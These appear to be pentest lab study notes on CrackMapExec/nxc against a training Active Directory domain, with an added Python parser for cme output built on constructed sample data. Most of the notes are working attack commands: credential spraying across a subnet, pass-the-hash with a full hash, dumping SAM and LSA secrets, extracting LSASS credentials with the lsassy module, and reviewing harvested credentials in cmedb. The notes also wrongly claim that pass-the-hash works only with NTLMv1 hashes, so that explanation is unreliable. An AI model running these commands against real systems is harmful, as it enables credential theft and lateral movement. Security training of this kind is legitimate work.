crackmapexec (cme)/nxc tips:
(Pwn3d!) means the credential gave local admin on that host, which is what we’re interested in
[+] means the credential was accepted (we have access to that host)
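Added example (not part of the original notes): a small parser for the output format the markers above describe, turning a subnet sweep into a findings summary: which hosts accepted the credential, where it gave local admin (a password-reuse finding), and which hosts report SMB signing disabled (the relay exposure the NTLM note below refers to). The sample output below is constructed, not a real scan.

```python
import re

# Constructed sample of cme/nxc SMB output for a small subnet (not real scan data).
SAMPLE_OUTPUT = """\
SMB  192.168.218.10  445  DC01       [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB  192.168.218.11  445  PUNISHER   [*] Windows 10 Build 19041 x64 (name:PUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB  192.168.218.12  445  SPIDERMAN  [*] Windows 10 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:True)
SMB  192.168.218.10  445  DC01       [-] MARVEL.local\\fcastle:Password1 STATUS_LOGON_FAILURE
SMB  192.168.218.11  445  PUNISHER   [+] MARVEL.local\\fcastle:Password1 (Pwn3d!)
SMB  192.168.218.12  445  SPIDERMAN  [+] MARVEL.local\\fcastle:Password1
"""

# One cme output line: protocol, ip, port, hostname, [marker], free text.
LINE_RE = re.compile(r"^SMB\s+(?P<ip>\S+)\s+\d+\s+(?P<host>\S+)\s+\[(?P<mark>[-+*])\]\s+(?P<rest>.*)$")

def parse_cme_output(text):
    """Return {ip: {"host", "signing", "smbv1", "login"}} built from cme/nxc output lines."""
    results = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        r = results.setdefault(m["ip"], {"host": m["host"], "signing": None, "smbv1": None, "login": "untested"})
        rest = m["rest"]
        if m["mark"] == "*":
            # [*] banner line: pull the SMB signing and SMBv1 flags
            s = re.search(r"\(signing:(True|False)\)", rest)
            v1 = re.search(r"\(SMBv1:(True|False)\)", rest)
            r["signing"] = (s.group(1) == "True") if s else None
            r["smbv1"] = (v1.group(1) == "True") if v1 else None
        elif m["mark"] == "-":
            r["login"] = "failed"
        elif m["mark"] == "+":
            # [+] = credential accepted; (Pwn3d!) = it is local admin there
            r["login"] = "admin" if "(Pwn3d!)" in rest else "access"
    return results

def summarize(results):
    """Group hosts by finding: local admin reached, valid but non-admin, signing not required."""
    return {
        "local_admin": sorted(ip for ip, r in results.items() if r["login"] == "admin"),
        "access_only": sorted(ip for ip, r in results.items() if r["login"] == "access"),
        "signing_disabled": sorted(ip for ip, r in results.items() if r["signing"] is False),
    }

if __name__ == "__main__":
    for k, v in summarize(parse_cme_output(SAMPLE_OUTPUT)).items():
        print(f"{k}: {', '.join(v) or '-'}")
```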
crackmapexec pass the password (plaintext creds):
crackmapexec smb 192.168.218.0/24 -u fcastle -d MARVEL.local -p Password1
crackmapexec pass the hash (only works with NTLM v1 hashes; NTLMv2 can’t be passed, but it can be relayed):
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth
Same command, but also dump the SAM (the dump is stored in the cme database):
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --sam
Enumerate the shares:
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --shares
Dump LSA secrets:
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth --lsa
List ALL the modules available in cme:
cme smb -L
To run a module, use -M followed by the module name (lsassy here):
cme smb 192.168.218.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:7facdc498ed1680c4fd1448319a8c04f --local-auth -M lsassy
To open the database mentioned earlier and look for stuff in it:
cmedb
Inside cmedb, creds displays all the GOOD $#!@: which user and password worked on which host, and in what format (plaintext or hash):
creds